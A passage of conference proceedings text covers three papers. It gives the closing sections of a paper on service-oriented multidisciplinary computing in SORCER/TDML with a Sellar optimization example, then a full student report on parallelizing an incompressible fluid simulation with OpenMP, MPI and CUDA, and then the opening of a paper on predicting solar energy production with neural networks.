ontologies of service providers. Contextion as the form of parametric polymorphism is a way to make a SO language more expressive with one generic type for inputs and outputs of all request services. 2. Morphing a request service is affected by the initial fidelities selected by the user and morphers of morph-fidelities. Morphers associated with morph-fidelities use heuristics provided by the end user that dependent on the input service contexts, and subsequent intermediate results obtained from service providers. Multifidelity management is a dispatch mechanism, a kind of ad hoc polymorphism, in which fidelities of request services are reconfigured or morphed with fidelity projection at runtime. 3. Service multityping as applied to service signatures to be bound at runtime to code providers is a multiple form of subtype polymorphism with the goal to find a remote instance of the code provider by the range of service types that a code provider implements and registers for lookup. It also allows a multifidelity opservice to call an operation of a primary service type implemented by the service provider as an alternate service fidelity.
3 Discipline Instantiation and Initialization In multidisciplinary programming, an instance is a concrete occurrence of any discipline, existing usually during the runtime of a multidisciplinary program. An instance emphasizes the distinct identity of the discipline. The creation of an instance is called instantiation and initialization is the assignment of initial values of data items used by a transdiscipline itself and its component disciplines. In Sect. 2.1 service signatures are described as the constructors of code providers used by elementary request services. Signatures prepare dynamically instances for use at runtime, often accepting multitypes to be implemented by a required instance of code provider. Multitype signatures may create new local code providers, bind to existing, in the network, or on-demand provision remote instances. Below, instantiation of request services is presented by so called builder signatures that uses static operations of declared builder types. A discipline builder is a design pattern designed to provide a flexible solution to creation of various types of transdisciplines (disciplines of disciplines). The purpose of the discipline builder is to separate the construction of a complex discipline from its representation and initial data. The discipline builder describes how encapsulate creating and assembling the parts of a complex discipline along with its data initialization. In SORCER builders are Java classes that may extend the Builder utility class. Therefore, a discipline delegates its creation to a builder instead of creating the discipline directly. It allows to change a discipline representation, called a builder signature, later independently from (without having to change) the domain itself. A builder signature is a representation of entity that is closely and distinctively associated and identified with a service provider, requestor, or intent. 1. A builder signature declares the corresponding entity builder. In TDML, a builder signature is expressed as follows:
Service-Oriented Multidisciplinary Computing
377
sig(op, bt) or sig(op, bt, init(att, val), ...) or sig(op, bt, initContext, init(att, val), ...)
where bt is the builder type; op is its static operation; initContext represents the initialization context (a collection of attribute–value pairs) used by the builder, usually by its initialize method; init(att, val) declares the initialization of the attribute att with the value val, init attribute-value pairs can be multiplied. 3.1 Explicit Discipline Instantiation with Builder Signatures The TDML instantiation operator inst is specified as follows: inst(sig(bt)) or inst(sig(op, bt)) or inst(sig(op, bt, init(att, val), ...)) or inst(sig(op, bt, initContext)) or inst(sig(op, bt, initContext, init(att, val), ...))
where bt is a builder class type and op its static builder operation. The first case corresponds to the default constructor of the class bt. 3.2 Implicit Discipline Instantiation by Intents intent( dscSig(builderSignature) or dscSig(op, bt) or dscSig(op, bt, init(att, val) ...), or dscSig(op, bt, initContext) or dscSig(op, bt, initContext, init(att, val) // other parts and builders of executable intent ...) )
where dscSig stands for the operator declaring a discipline builder signature.
4 Discipline Execution and Aggregations With respect to types of disciplines declared in disciplinary intents, an intent is executed by a corresponding TDML operator (executor), e.g., responses, search, analyze, explore, supervise, and hypervise. The executed intent contains both a result and its executed discipline. A created or executed discipline that is declared by myIntent is selected by discipline(myIntent). If a discipline intent declares an output filter, then myResult = explore(myInent), otherwise the result can be selected from the executed intent with TDML operators (getters) and/or disciplinary Java API.
378
M. Sobolewski
Note that when a discipline is a discipline of disciplines, so it becomes a service consumer with respect to its component disciplines that in turn are service providers. Subsequently any composed provider may be a requestor of services. Service-oriented computing adhere to distributed architecture that partitions workloads between service peers. A peer can be a service requestor and/or service provider. A service consumer utilizes results from multiple service requestors that rely on code providers (workers). Services are said to form a peer-to-peer (P2P) network of services. Disciplinary peers make a portion of their disciplines directly available to other local and/or remote network disciplines, without the need for central coordination in contrast to the traditional client– server model in which the consumption and supply of resources is strictly divided. Transdisciplines and disciplines adopt many organizational architectures. Elementary services are functional service entries and procedural tasks. Aggregations of functional entries (functions of function) form declarative domains called service models. Aggregations of procedural tasks form imperative domains called service routines: block-structured and composite-structured routines. Models and routines are elementary disciplines used to create various types of transdisciplines, e.g., transdomains (either transmodels or transroutines), collaboration, regions, and governances with relevant adaptive multifidelity morphers and controllers (e.g., analyzers, optimizers, explorers, supervisors, hypervisors, initializes, and finalizers) that manage cooperations of disciplines. Five service-oriented types of service aggregations are distinguished as illustrated in Fig. 2. Elementary and combined services are called request service. Elementary services comprise opservices, but combine service comprise request services. Disciplines are combined services. Each disciplinary type represents a different granularity of hierarchically organized code providers in the network referred by operation services (evaluators and signatures). Transdisciplines are comprised of disciplines, transdomains from domain services (models and routines), that in turn are comprised of elementary services (entries and tasks correspondingly), that in turn rely on opservices (evaluators and signatures), that in turn bind at runtime to code providers in the network of domain specific ATUs. The UML diagram in Fig. 2, illustrates five described granularities of services from the highest transdisciplinary to the lowest opservice granularity. Opservices as required by transdisciplines use code providers that call associated executable codes.
Fig. 2. Five Types of Service Aggregations: From Code Providers to Transdisciplines
Service-Oriented Multidisciplinary Computing
379
5 An Example of a Distributed Transdiscipline in TDML To illustrate the basic TDML concepts, the Sellar multidisciplinary optimization problem [4] is used to implement a multidisciplinary analysis and optimization (MADO) transdiscipline. Distributed transdisciplines in TDML allow for component disciplines to be two-way coupled and distributed in the network as well. We will specify in Sect. 5.1 a Sellar intent sellarIntent that declares its transdiscipline by a builder signature as follows: disciplineSig(SellarRemoteDisciplines.class, createSellarModelWithRemoteDisciplines").
The transdiscipline is implemented by a method createSellarModelWithRemoteDisciplines of a class SellarRemoteDisciplines described
in Sect. 5.2, then in 5.3 the Sellar intent sellarIntent is executed. 5.1 Specify the Sellar Intent with the MadoIntent Operator
Intent sellarIntent = madoIntent( initialDesign(predVal("y2$DiscS1", 10.0), val("z1", 2.0), val("x1", 5.0), val("x2", 5.0)), disciplineSig(SellarRemoteDisciplines.class, "createSellarModelWithRemoteDisciplines"), optimizerSig(ConminOptimizerJNA2.class), ent("optimizer/strategy", new ConminStrategy(…)), mdaFi("fidelities", mda("sigMda", sig(SellarMda.class)), mda("lambdaMda", (Requestor mdl, Context cxt) -> { Context ec; double y2a, y2b, d = 0.000001; do { update(cxt, outVi("y1$DiscS1"), outVi("y2$DiscS2")); y2a = (double) exec(mdl, "y2$DiscS1"); ec = eval(mdl, cxt); y2b = (double) value(ec, outVi("y2$DiscS2")) } while (Math.abs(y2a - y2b) > d); })));
380
M. Sobolewski
Note that the Sellar transdiscipline is declared by disciplineSig with two fidelities for multidisciplinary analysis (MDA) and the Conmin optimizer. The first MDA fidelity is specified by a ctor signature, the second one by a lambda evaluator. 5.2 Define the Sellar Model with Two Distributed Disciplines The Sellar transdiscipline has own builder for itself with two separate builders for component disciplines DiscS1 and DiscS2. Builders implement all disciplines as declared in TDML below with component disciplines to be deployed in the network. The Sellar model declares variables of dependent remote disciplines by proxies of remote models declared by the remote signatures sig(ResponseModeling.class, prvName("Sellar DiscS1")) and sig(ResponseModeling.class, prvName("Sellar DiscS2")) correspondingly. Note that the proxy variables y1 and y2 of remote disciplines DiscS1and DiscS2 are coupled in sell-
arDistributedModel being remote disciplines in the network as specified by the remote interface ResponseModeling and names used for remote models: "Sellar DiscS2" and "Sellar DiscS2" . The TDML svr operator declare a service variable (as a function of functions via args).
Service-Oriented Multidisciplinary Computing
381
MadoModel sellarDistributedModel = madoModel("Sellar", objectiveVars(svr("fo", "f", SvrInfo.Target.min)), outputVars(svr("f", exprEval( "x1*x1 + x2 + y1 + Math.exp(-y2)", args("x1", "x2", "y1", "y2"))), svr("g1", exprEval("1 - y1/3.16", args("y1"))), svr("g2", exprEval("y2/24 - 1", args("y2")))), // w.r.t inputVars(svr("z1", 1.9776, bounds(-10.0, 10.0)), svr("x1", 5.0, bounds(0.0, 10.0)), svr("x2", 2.0, bounds(0.0, 10.0))), // s.t. constraintVars( svr("g1c", "g1", SvrInfo.Relation.lte, 0.0), svr("g2c", "g2", SvrInfo.Relation.lte, 0.0)), // disciplines with remote vars responseModel("DiscS1", outputVars( prxSvr("y1", sig(ResponseModeling.class, prvName("Sellar DiscS1")), args("z1","x1", "x2", "y2")))), responseModel("DiscS2", outputVars( prxSvr("y2", sig(ResponseModeling.class, prvName("Sellar DiscS2")), args("z1", "x2", "y1")))), //two-way couplings: svr-from-to cplg("y1", "DiscS1", "DiscS2"), cplg("y2", "DiscS2", "DiscS1")); configureSensitivities(sellarDistributedModel);
Remote response models that are deployed by SORCER service provider containers, are declared in TDML as follows:
382
M. Sobolewski
Model dmnS1 = responseModel("DiscS1", inputVars(svr("z1", 1.9776, bounds(-10.0, 10.0)), svr("x1", 5.0, bounds(0.0, 10.0)), svr("x2", 2.0, bounds(0.0, 10.0)), svr("y2")), outputVars( svr("y1", exprEval("z1*z1 + x1 + x2 - 0.2*y2", args("z1","x1", "x2", "y2"))))); Model dmsS2 = responseModel("DiscS2", inputVars(svr("z1", 1.9776, bounds(-10.0, 10.0)), svr("x1", 5.0, bounds(0.0, 10.0)), svr("x2", 2.0, bounds(0.0, 10.0)), svr("y1")), outputVars( svr("y2", exprEval("Math.sqrt(y1) + z1 + x2", args("z1", "x2", "y1")))));
5.3 Execute the Sellar Intent Now, we can perform exploration of the distributed Sellar specified by the intent sellarIntent created in 5.1: ExploreContext result = explore(sellarIntent);
and inspect received results embedded in the returned result. The presented above Sellar model case study was developed as a design template for currently used complex aero-structural multidisciplinary models at the Multidisciplinary Science and Technology Center/AFRL.
6 Conclusions The mathematical view of process expression has limited computing science to the class of processes expressed by algorithms. From experience in the past decades it becomes obvious that in computing science the common thread in all computing disciplines is process expression; that is not limited to algorithms or actualization of process expression by a single computer. In this paper, service-orientation is proposed as the approach with five types of service aggregations (see Fig. 2). The “everything is a service” semantics of TDML (see Fig. 1) has been developed to deal with multidisciplinary complexity at various levels to be actualized by dynamic cooperations of code providers in the network. The SORCER architectural approach represents five types of net-centric service cooperations expressed by request services. In general, disciplinary requestors (context intents) are created by the end users but executable codes of code providers by software developers. It elevates combinations of disciplines into the first-class citizens of the SO multidisciplinary process expression.
Service-Oriented Multidisciplinary Computing
383
True service-orientation means that in the netcentric process both the service requestors and providers must be expressed then realized under condition that service consumers should never communicate directly to service providers. Transdisciplines are asserted complex cooperations of code providers represented in TDML directly by operation services. This way, everything is a service at various service granularity (see Fig. 2). Therefore, request services represent cooperations of opservices bound at runtime to code providers to execute computations. The essence of the approach is that by making specific choices in grouping hierarchically code providers for disciplines, we can obtain desirable dynamic properties from the SO systems we create with TDML. Thinking more explicitly about SO languages, as domain specific languages for humans than software languages for computers, may be our best tool for dealing with real world multidisciplinary complexity. Understanding the principles that run across process expressions in TDML and appreciating which language features are best suited for which type of processes, bring these process expressions (context intents in TDML) to useful life. No matter how complex and polished the individual process operations are, it is often the quality of the operating system (SORCER) and its programing environment (TDML) that determines the power of the computing system. The ability of presented transdisciplines with SO execution engine to leverage network resources as services is significant to real-world applications in two ways. First, it supports multi machine executable codes via opservices that may be required by SO multidisciplinary applications; second, it enables cooperation of variety of computing resources represented by multiple disciplines that comprise of the network opservices actualized by the multi machine network at runtime. Embedded service integration in the form of transdisciplines in TDML solves a problem for both system developers and end users. Embedded service integration is a transformative development that resolves the stand-off between system developers who need to innovate service integrations and end users, as coproducers, want their services to be productive in their multidisciplinary systems, not hold them back. Multidisciplinary integration is key to this, but neither system developers nor end-users want to be distracted by time-consuming integration projects. The SORCER multidisciplinary platform has been successfully deployed and tested for design space exploration, parametric, and aero-structural optimization in multiple projects at the Multidisciplinary Science and Technology Center AFRL/WPAFB. Most MADO applications and results are proprietary except those for public release. Acknowledgments. This effort was sponsored by the Air Force Research Laboratory’s Multidisciplinary Science and Technology Center (MSTC), under the Collaborative Research and Development for Innovative Aerospace Leadership (CRDInAL) - Thrust 2 prime contract (FA8650-16C-2641) to the University of Dayton Research Institute (UDRI). This paper has been approved for public release: distribution unlimited. Case Number: AFRL-2022-1664. The effort is also partially supported by the Polish Japanese Academy of Information Technology.
384
M. Sobolewski
References 1. Burton, S.A., Alyanak, E.J., Kolonay, R.M.: Efficient supersonic air vehicle analysis and optimization implementation using SORCER. In: 12th AIAA Aviation Technology, Integration, and Operations (ATIO) Conference and 14th AIAA/ISSM AIAA 2012–5520 (2012) 2. Kao, J.Y., White, T., Reich, G., Burton, S.: A multidisciplinary approach to the design of a lowcost attritable aircraft. In: 18th AIAA/ISSMO Multidisciplinary Analysis and Optimization Conference, AIAA Aviation Forum 2017, Denver, Colorado (2017) 3. Kolonay, R.M., Sobolewski, M.: Service oriented computing environment (SORCER) for large scale, distributed, dynamic fidelity aeroelastic analysis & optimization. In: International Forum on Aeroelasticity and Structural Dynamics, IFASD2011, 26–30 June, Paris, France (2011) 4. Sellar, R.S., Batill, S.M., Renaud, J.E.: Response surface based, concurrent subspace optimization for multidisciplinary system design, Paper 96-0714. In: AIAA 34th Aerospace Sciences Meeting and Exhibit, Reno, Nevada January (1996) 5. Sobolewski, M.: Federated P2P services in CE environments. In: Advances in Concurrent Engineering, pp. 13–22. A.A. Balkema Publishers (2002) 6. Sobolewski, M.: Service oriented computing platform: an architectural case study. In: Ramanathan, R., Raja, K. (eds.) Handbook of Research on Architectural Trends in ServiceDriven Computing, pp 220–255. IGI Global, Hershey (2014) 7. Sobolewski, M.: Amorphous transdisciplinary service systems. Int. J. Agile Syst. Manag. 10(2), 93–114 (2017) 8. Sobolewski, M.: True service-oriented metamodeling architecture. In: Ferguson, D., Méndez Muñoz, V., Pahl, C., Helfert, M. (eds.) CLOSER 2019. CCIS, vol. 1218, pp. 101–132. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-49432-2_6 9. SORCER/TTU Projects. http://sorcersoft.org/theses/index.html. Accessed 22 July 2022 10. SORCER Project. https://github.com/mwsobol/SORCER-multiFi. Accessed 22 July 2022 11. River (Jini) project. https://river.apache.org. Accessed 22 July 2022 12. Rio Project. https://github.com/dreedyman/Rio. Accessed 22 July 2022
Incompressible Fluid Simulation Parallelization with OpenMP, MPI and CUDA Xuan Jiang1(B) , Laurence Lu2 , and Linyue Song3 1
Civil and Environmental Engineering Department, UC Berkeley, Berkeley, USA [email protected] 2 Electrical Engineering and Computer Science Department, UC Berkeley, Berkeley, USA 3 Computer Science Department, UC Berkeley, Berkeley, USA
Abstract. We note that we base our initial serial implementation off the original code presented in Jos Stam’s paper. In the initial implementation, it was easiest to implement OpenMP. Because of the grid-based nature of the solver implementation and the shared-memory nature of OpenMP, the serial implementation did not require the management of mutexes or otherwise any data locks, and the pragmas could be inserted without inducing data races in the code. We also note that due to the Gauss-Seidel method, which in solving a linear system only requires intermediate steps, it is possible to introduce errors that cascade due to relying on neighboring cells which have already been updated. However, this issue is avoidable by looping over every cell in two passes such that each pass constitutes a disjoint checkerboard pattern. To be specific, the set bnd function for enforcing boundary conditions has two main parts, enforcing the edges and the corners, respectively. However, this imposes a strange implementation where we dedicate exactly a single block and a single thread to an additional kernel that resolves the corners, but it’s almost not impacting the performance at all and the most time consuming parts of our implementation are cudaMalloc and cudaMemcpy. The only synchronization primitive that this code uses is syncthreads(). We carefully avoided using atomic operations which will be pretty expensive, but we need syncthreads() during the end of diffuse, project and advect because we reset the boundaries of the fluid every time after diffusing and advecting. We also note that similar data races are introduced here without the two passes method mentioned in the previous OpenMP section. Similar to the OpenMP implementation, the pure MPI implementation inherits many of the features of the serial implementation. However, our implementation also performs domain decomposition and the communication necessary. Synchronization is performed through these communication steps, although the local nature of the simulation means that there is no implicit global barrier and much computation can be done almost asynchronously. Keywords: OpenMP Computation
· MPI · CUDA · Fluid Simulation · Parallel
c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 385–395, 2023. https://doi.org/10.1007/978-3-031-28073-3_28
386
1
X. Jiang et al.
Introduction
In order to make the fluid simulator unconditionally stable, Jos Stam’s [4] implementation makes an approximation while computing the diffusion effects. Specifically, instead of intuitively using the densities of eight surrounding cells in the PREVIOUS step to update the density of the center cell in current step, it uses the densities of the neighboring cells in the CURRENT step. Hence, makes the implementation horizontally and vertically asymmetric and unparallizable. However, we find that the intuitive implementation of the simulation would be unstable only if the diffusion rate is larger than 1, and Jos Stam defines it to be dt ∗ gridSize2 ∗ const. We think the qualitative local behaviour should not depend on the size of the grid, so we replaced the gridSize with a Scale variable which is a constant that represents the spatial step size. Now, as long as we set an appropriate value for the scale variable, the intuitive implementation (using previous states to update current states) is always stable. Therefore, we implement our own serial version of fluid simulator, which has a newly defined diffusion rate and uses the previous states to update the current states. We set this parallizable implementation as our serial base code.
2 2.1
Implementation and Tuning Effort OpenMP
After running Intel vTune profiler on our serial implementation, we have the following results (Fig. 1):
Fig. 1. Serial implementation runtime distribution
The project function is by far the most costly function. Indeed, there are a few multi-level loops in the project function. By using omp for collapse around the loop blocks, we successfully reduce the run time of the project function to a quarter of its original run time when using four threads. After running Intel vTune profiler on our serial implementation, we have the following results (Fig. 2):
Incompressible Fluid Simulation Parallelization
387
Fig. 2. OpenMP implementation runtime distribution
2.2
MPI
Because of the heavily localized nature of our fluid solver, we make the following observations: because the projection, advection, and diffusion steps all act on different quantities of the fluid (e.g. pressure and velocity), we found that it would be more efficient With MPI, one of the more difficult implementation problems was finding a general method for domain decomposition. With the dimension of the grid being rigidly fixed in an array, as opposed to being an abstract square of fixed width, it is difficult to find a division of the array that is not simple row-by-row (especially if the number of processes and the array-width are co-prime. We first attempted our domain decomposition by finding a pair (a, b) such that ab = p, and both of which divide N + 2 (the number of rows with borders). Given such a pair, we chunk the fluid array with into blocks of size (N + 2)/a by (N + 2)/b. If no satisfactory decomposition can be found, we implemented domain decomposition in a nearly row-by-row manner. In the case that there are more rows than processes, we rely on tags and nonblocking send/receive calls to prevent malicious overlapping of messages, with each process getting N/p rows, and an additional row if their rank happens to be below the remainder N %p. If there are more processes than rows, we force the processes with rank higher than N to terminate early. However, this method is still difficult to generalize fully, especially if N + 2 happens to be prime (or coprime to the number of processors, which is likely!). Otherwise, within each processor’s block, iteration proceeds very similarly to a regular serial solver. We note the extreme burden of communication costs in the row-by-row scenario by immediately adapting the serial implementation. In the worst case, row decomposition is known to maximize the side-length of a block with respect to other regular decompositions (such as square grid cells) and because of the dependence of the Gauss-Seidel method on intermediate computations, there is a very high amount of communication performed between adjacent processes. Because of this, we experimented with using the Jacobi method (which only relies on the initial values at each timestep) so that communication happens when computations finish, as opposed to communicating on every intermediate step.
388
2.3
X. Jiang et al.
CUDA
Initially we copy data from CPU to GPU during each iteration of the simulation, but this is a super time consuming process and it’s introducing a lot of segmentation fault which took us a lot of efforts to debug. And after we finally put everything into work(no segmentation fault but still didn’t pass the correctness check), we found the speed of CUDA is even slower than openMP. After carefully discussion, we decided to only copy data once at the beginning of the simulation instead of copying several times for different iterations. This saved us a decent amount of time for copying data since we are doing 100 iterations in our simulation. And this time our CUDA code is 7X faster than openMP. We used an array to store the location of the fluid into different grids as the pointer to the location, since fluid would be sorted and stored contiguously into grids. But we had a lot of trouble figuring out how to make this ensure correctness, as in init_simulation everything would seem correct, but after iterations, there was synchronization issues where sometimes the grids wouldn’t be sorted properly. Adding synchronization primitives such as cudaDeviceSynchronize() and __syncthreads() only slowed down the code and didn’t fix correctness. We tried several things to solve this: 1.Locate exact locations where density array went wrong by printf in CUDA 2.Checked another variables to see whether it goes wrong 3. check the value before and after copy to see is there any GPU end of error 4. checked whether did we copied data or pointers. After all those checks, we finally located that there are some copy things going wrong since there are so many of them and it’s easy to mess the size of different objects up. And we didn’t load all the modules we need which causes the segmentation fault as well, now we passed the correctness check but we were worried that data racing would incur a lot of GPU cache misses. Given that the GPU architecture is very expensive and performant on registers and memory bandwidth, this type of concern should be free and very minimal. The final implementation is way faster than openMP and serial code Ignoring correctness, the performance of copy data at each iteration was very bad, and it was due to the calls of cudaMemCpy to do transfer data from CPU to GPU several times. Fortunately, our final implementation resides all of its computation on the GPU memory. Surprisingly, the code is very straightforward and cleaner than the original implementation.
3
Experimental Data: Scaling and Performance Analysis and Interesting Inputs and Outputs
After finishing our OpenMP and CUDA implementation, we conducted our experiments on the Cori supercomputer at National Energy Research Scientific center and Bridges-2 supercomputer at Pittsburgh Supercomputing Center respectively.
Incompressible Fluid Simulation Parallelization
3.1
389
OpenMP
Slowdown Plot. Figure 3 shows the slowdown plot of our OpenMP implementation. We can clearly see that the can be divided into two sections. For the first three data points in the plot, the run time grows linearly as the problem size increases. This is what we expected since in our implementation there is minimal communication among the threads. However, if we take a closer look, the slope of the line is less than 1. We think this abnormality can be explained by the problem size of the first three data points. When the problem size is small, the program spends most of its run time in setup operations such as memory allocations and initial operations, rather than actual computations. For the second half the plot, the program run time grows linearly with a slope close to 1. This is an indication that the computation time starts to dominate the program run time. Because there is minimal communication overheads in our OpenMP implementation, the slope of the curve is close to 1.
Fig. 3. OpenMP log-log slowdown plot. Num Thread = 68
3.2
Strong Scaling
Figure 4 shows a strong scaling plot for our OpenMP implementation when grid size is 200 * 200. Before the number of threads increases to 16, the curve decreases linearly with a close to –1 slope, which indicates a good strong scaling efficiency. However, when the number of threads reaches 16, the program run time starts to flat out. We believe this is caused by the setup overheads of OpenMP threads. When there are excessive number of threads for a problem with small size, the marginal benefit of adding additional threads diminishes. To verify our
390
X. Jiang et al.
Fig. 4. Strong scaling OpenMP for grid size = 200 * 200
Fig. 5. Strong scaling OpenMP for grid size = 400 * 400
hypothesis, we also conduct the strong scaling experiment with a problem size of 400 * 400 (Fig. 4). We can see that with a larger problem size, our OpenMP implementation scales well even when the number of threads increases to 64 and is very close to the ideal scaling line. 3.3
Weak Scaling
Figure 6 shows the weak scaling plot of our OpenMp implementation. For the first three data points the weak scaling efficiency is around 67% and for the entire curve the weak scaling efficiency is around 31%. The slope suddenly increases near the end of the curve. Since there is not much communication overheads in our OpenMp implementation, we think this is caused by thread setup/free costs and the memory allocation costs. Memory allocations are not done in parallel and allocating a large chunk of memory can impact the program run time significantly, as the overall program run time is relative small.
Incompressible Fluid Simulation Parallelization
391
Fig. 6. Weak scaling OpenMP
3.4
MPI
Strong Scaling. We tested for one node with fixed 3200 * 3200 block size Fig. 7 shows that we are only seeing a little jump on from 16 to 32 ranks and then we are remaining good performance on increasing number of processors by two times. 1.00
strong scale efficiency
0.75
0.50
0.25
0.00 10
20
30
40
50
60
Num_of_processors
Fig. 7. Strong scaling MPI
Weak Scaling. We can see from Fig. 8 that our weak scaling efficiency is highest while we are using two tasks which is 77.56% and when we increasing the number of of ranks and number of blocks by the same times, the weak scaling efficiency is going all the way down to 55.01%, but it’s still pretty good.
392
X. Jiang et al. 0.8
weka scaling efficinecy
0.6
0.4
0.2
0.0 10
20
30
40
50
60
num of processors
Fig. 8. Weak scaling MPI
SlowDown Comparison. From Fig. 9, we can see that the openMP is the slower, and then MPI and CUDA is the fastest. OpenMP -> MPI -> CUDA Cuda
OpenMP
MPI(68 ranks)
80
60
40
20
0 500
1000
1500
2000
2500
3000
Fig. 9. Slow down comparison
3.5
CUDA
Slowdown Plot. Figure 10 shows the slowdown plot of our CUDA implementation. It also compares the performance of the CUDA implementation to the OpenMP implementation. We can see that the run time of our CUDA implementation increases at a much smaller slope than the OpenMP implementation. This is expected as there are more threads on GPUs. Just like homework 2.3, we have not find a good to change the number of threads used by GPUs on Bridges-2, so we are able to perform strong scaling analysis for our CUDA implementation.
Incompressible Fluid Simulation Parallelization
393
Fig. 10. Strong Scaling Comparison CUDA vs OpenMP
4 4.1
Conclusion Difficulty
Theoretic Content/Creativity. Fluid dynamics simulation is usually done in serial ways. Jos Stam [4] proposed ways of implementing two-dimensional serial fluid simulation based on real fluid physics, which is determined by the Navier-Stokes equations: ∂u ∂t ∂ρ ∂t
= −(u · ∇)u + v∇2 u + f = −(u · ∇)ρ + κ∇2 ρ + S
where the first equation determines the movement of the velocity field and the second one determines the movement of the density field. But this two dimensional implementations usually took O(n2 ) time complexity. To implement it in a parallel way, here are the main difficulties so far and the places we used our creativity to solve the problem (detailed implementations are in the above sections): 1. Need to take care about high time complexity problems because fluid is placed in the grid contains a density and a velocity so that the movement is determined by the steps of simulation carried out by the density and velocity. However, those steps are done one by one which consumes a lot of time since a lot of the computation requires O(n2 ) time complexity. 2. It’s hard to update the diffusing of fluids in a parrallel way. 3. Need to try some form of domain decomposition for MPI version which takes quite a long time for debugging. 4. It’s pretty ambitious to target both distributed memory and GPUs. Design/Analysis of Algorithms. The hardest part of this project should be the communication of diffrent parts of the simulation. And we are facing some data races problems and also if we didn’t do the synchronization correctly we might be facing segmentation fault as well. And it’s fatal for us to choose the most
394
X. Jiang et al.
efficient data structure to do the implementation as well. And this simulation is a little complicated which requires us to understand the physics behind it, and how to set boundary. And there are some extented knowledge about Velocity Diffusion, velocity advection, density diffusion and advection that we need to learn about to further serve our project. We successfully use openMP, MPI and CUDA to achieve the parallelism of fluid simulation. We discussed our special design of our algorithms case by case in the above sections. 4.2
Timeliness of the Contribution
There are several approaches of Incompressible fluid simulation. There are a lot of brilliant algorithms going on for solving this kind of problem: 1. In 2003, Jos Stam [4] proposed approximation way of doing fluid simulation based on Navier-Stokes equations, and this is a two-dimensional version based on real fluid physics, which will be our baseline and also for our correctness check of our implementation. 2. In 2005, Micheal Ash [1] was able to change the two-dimensional implementation into three-dimensional implementation, which will be the baseline for us to further speed up the three-dimensional version. And this one motivated us to further compare how it’s different between the implementing of openmp or cuda. 3. In 2008, Molemaker et al. tried to use Iterated Orthogonal Projection (IOP) to solve the problem and successfully reduece the time complexity from O(n2 ) to O(nlogn) [3]. 4. In 2017, Chu et al proposed an optimization way of utilizing multigrid of preconditioned conjugate gradient to give the ability of solving the problem with 10243 degrees of freedom.[2]. we are curious to see how is our method compared with theirs. Since its implementation mostly focuses on achieving faster convergence on multiple core CPU. And we are curious about how is it compared with GPU implementation or even comparing GPU with the parallel of CPU. With the development of openmp and cuda state-of-art technologies, it’s the right time for us to explore, understand and to some extent answer how faster we can do with the knowledge we have learnt in CS267 so far can achieve. And it’s also the right time for us to learn about in which level it’s profiling, what’s the weak and strong scale with our implementation. And finally we will compare the version using Cuda and the version using openmp to do a deep dive of the computation difference of CPU and GPU in this kind of problems. Acknowledgment. During our experiments, we notice that the performance of both our OpenMP implementation and CUDA implementation vary slightly throughout the day. This happens both the Cori supercomputer and the Bridges-2 super computer. We suspect that this variation is due to the workload of the supercomputer system at the time of experiments. In order to mitigate the effect of this uncontrollable factor on our experiment results, we conduct all of our experiments in consecutive runs at
Incompressible Fluid Simulation Parallelization
395
around same time. In addition, each data point in our graphs is an average of three experiment runs. What’s more, since the goal of our experiments is to understand the scaling and relative performance of different parallelized implementations, we believe a small shift of absolute measurement in the same direction should have minimal effect on our analysis conclusions.
References 1. Ash, M.: Simulation and visualization of a 3d fluid. Master’s thesis, Universit´e d’Orl´eans France (2005) 2. Chu, J., Zafar, N.B., Yang, X.: A schur complement preconditioner for scalable parallel fluid simulation. ACM Trans. Graph. (TOG) 36(4), 1 (2017) 3. Molemaker, J., Cohen, J.M., Patel, S., Noh, J., et al.: Low viscosity flow simulations for animation. In: Symposium on Computer Animation, vol. 2008 (2008) 4. Stam, J.: Real-time fluid dynamics for games. In: Proceedings of the Game Developer Conference, vol. 18, p. 25 (2003)
Predictive Analysis of Solar Energy Production Using Neural Networks Vinitha Hannah Subburaj1,2(B) , Nickolas Gallegos1,2 , Anitha Sarah Subburaj1,2 , Alexis Sopha1,2 , and Joshua MacFie1,2 1 West Texas A&M University, Canyon, TX 79015, USA
[email protected] 2 GNIRE, Lubbock, TX 79416, USA
Abstract. The energy industry is always looking at smart ways of conserving and managing the growing demand of consumable and renewable energy. One of the main challenges with modern electric grids systems is to develop specialized models to predict various factors, such as optimal power flow, load generation, fault detection, condition-based maintenance on assets, performance characteristics of assets, and anomalies. When it comes to energy prediction, the data that is associated with it is diverse. Accurate analysis and predictions of such data cannot be done manually and hence needs a powerful computing tool that is capable of reading such diverse data, converting them to a form that can be used for analysis and knowledge discovery. In this research effort, data collected from a local utility company over a period of three years from 2019 to 2021 were used to perform the analysis. Machine learning and neural network algorithms were used to build the predictive model. Different levels of data abstraction along with optimization of model parameters were done for better results. A comparative study was done at the end on the various algorithms used to determine the model performance. Keywords: Renewable energy · Energy production · Data analysis and prediction · Neural networks
1 Introduction Nowadays, renewal energy sources are in high-demand and effective utilization of them is increasingly becoming important. Solar energy is a renewable resource for power that is becoming very popular across the globe and the smart monitoring of power generation and utilization is crucial. The various parameters that control the production of energy and the effective utilization of energy resources thereafter pose a lot of challenges to utility companies and hence computational solutions to help them turn any data into useful information, is the need of the hour. Computational models that could effectively predict the utilization of renewable energy resources will be of great importance to the energy industries. In recent years, Artificial Neural Networks (ANN) have been used in the prediction of solar energy with different parameters such as humidity, pressure, temperature, precipitation, surface pressure, etc. Using historical data from the past, ANN models have © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 396–415, 2023. https://doi.org/10.1007/978-3-031-28073-3_29
Predictive Analysis of Solar Energy Production
397
the capability of forecasting solar power generation. The main contributions and goals of this study are to i) identify the different parameters that are involved when predicting solar energy production, ii) compare the effectiveness of machine learning and deep learning models for predicting solar energy using various metrics, and iii) determine which model is able to provide a sufficient level of accuracy for solar energy predictions. iv) to develop a uniform framework for solar energy projections that could be applied to similar problems; and iv) to conduct economic analyses of energy production using local marginal process values that are supplied by local utility companies. The remainder of this paper is organized as follows: Sect. 2 includes a related work that provides background with concepts and definitions. Section 3 provides a summary of the data preparation and technique used to develop the prediction models. The results are presented and discussed in Sect. 4. Section 5 concludes by summarizing the findings and future research work.
